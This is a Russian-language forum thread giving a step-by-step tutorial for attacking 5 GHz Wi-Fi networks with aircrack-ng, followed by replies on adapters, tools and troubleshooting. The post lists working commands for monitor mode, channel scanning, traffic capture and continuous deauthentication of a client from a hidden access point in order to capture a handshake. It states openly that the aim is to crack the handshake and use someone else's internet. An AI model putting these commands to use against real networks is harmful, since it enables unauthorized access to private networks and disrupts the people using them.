Вардрайвинг 5 Ггц Wi-Fi сетей

Вардрайвинг 5 Ггц Wi-Fi сетей
Для вардрайвинга в сетях 5 Ггц нам понадобиться Wi-Fi адаптер и антенна поддерживающие работу в этих сетях (Ваш КО):
У меня это Alfa AWUS051NH и 2х диапазонная антенна D-link ANT70-1000:

Все работы будут проводиться с помощью стандартного пакета программ от Aircrack-ng 1.2 beta2

Для начала запустим режим монитора на нашем адаптере (тут всё стандартно. Разве что у меня он mon2, а у Вас может быть любой другой):
airmon-ng start wlan2

Дальше осмотримся в эфире и посмотрим какие сети есть в диапазоне 5 Ггц:

airodump-ng mon0 -C 5170-5825 --manufacturer
Командой -C 5170-5825 указываем частоты в Мегагерцах каналов с 36 по 165.

Посмотрим на результат:


Как мы видим по результатам -все попавшиеся нам на 5 Ггц точки доступа имеют скрытый SSID .
Ну что ж будем вскрывать. Я выбрал TP-Link поскольку на нем был клиент и сигнал от этой ТД самый хороший.
Запустим airodump – ng на нужном нам канале (36) с захватом трафа в CAP файл :
airodump-ng mon0 -C 5180 -w hide --manufacturer



-C 5180 – Это наш 36 канал
-w hide - Это команда на запись трафа в CAP файл с названием hide
--manufacturer – это команда для информации о производители ТД.

В месте с этим запускаем деатентификацию клиента от атакуемой скрытой ТД:
aireplay-ng --deauth 0 -a F8:1A:67:FF:FF:FF mon0
-a F8:1A:67:FF:FF:FF - это bssid нашей ТД
--deauth 0 – команда на бесконечную деаутентификацию клиентов от атакуемой ТД

Смотрим на результат атаки:


Мы поймали hanshake и узнали имя скрытой сети: “Hide_Net” .

Теперь остается расшифровать handshake (процедура стандартная, расписывать отдельно не буду) и пользоваться интернетом на 5Ггц.

 

Может немного не в тему:
Вот всегда было интересно - если идет бесконечная деаутентификация, то как клиент, только что вылетевший с точки доступа, проходит аутентификацию, ведь постояно же идёт атака?

 

ну выставь вместо 0 цифру 4

 

Клиент успевает переподключиться между деаутентификациями. Да и в место значеия "0" можно любое другое выставить.

 

user100

5180 - откуда известно, что это 36 канал?

 

http://bwa.lgp.kz/rf_bwa.php

 

Как всегда очень ценная инфа. Спасибо.

 

Оказывается на 5 ГГц уже постепенно возникает жизнь))

Скажите, есть ли смысл покупать оборудование если я живу на высоком этаже в центре крупного города? А еще, подскажите, какие 5ГГц адаптеры есть с поддержкой режима мониторинга кроме альфы? Мне не нужно чтоб была какая-то космическая сила выдачи, а просто чтоб можно было купить в каком нибудь крупном торговом центре для техники (не любюлю заказывать онлайн) и чтоб можно было прикрутить внешнюю антенну. Спасибо.

 

Для информации - у 5 ГГц радиус действия точек доступа меньше, чем у стандартных 2.4 Ггц и антенна нужна посильнее.
Вот на вскидку 5ГГц адаптеры:
PCMCIA:
Ubiquiti SR71-C
Atheros 9220 (b/g/n) / a/b/g/n
Monitor Mode + Injection

Expresscard:
Ubiquiti SR71-X
Atheros AR9280 / a/b/g/n
Monitor Mode + Injection
MiniPCI
Mikrotik R52N
Atheros AR9220 / a/b/g/n
Monitor Mode + Injection

MiniPCI-Express
Ubiquiti SR71-E
Atheros AR9280 ABGN
Monitor Mode + Injection

Ищите на Яндекс маркете.

 

Как ни странно моя антенна D-Link ANT24-1800 расчитанная на диапазон 2.4 – 2.5 ГГц прекрасно ловит 5 ГГц с Alfa AWUS051NH. И расстояние судя по всему порядка 1 км. Сетей много, все открытые. Сделать ни чего не могу. Уже задовал вопрос в смежной теме.

 

Не пробовали утилиту wifite для осмотра?
Когда точек много, все на экран не помещаются, она выручает. К тому же сама запускает режим мониторинга, может mac адаптера подменять. Советую

 

Когда точек много, выручают клавиши A и D

 

В месте с этим запускаем деатентификацию клиента от атакуемой скрытой ТД:
aireplay-ng --deauth 0 -a F8:1A:67:FF:FF:FF mon0
[/QUOTE]
У меня в результате: "No such BSSID available".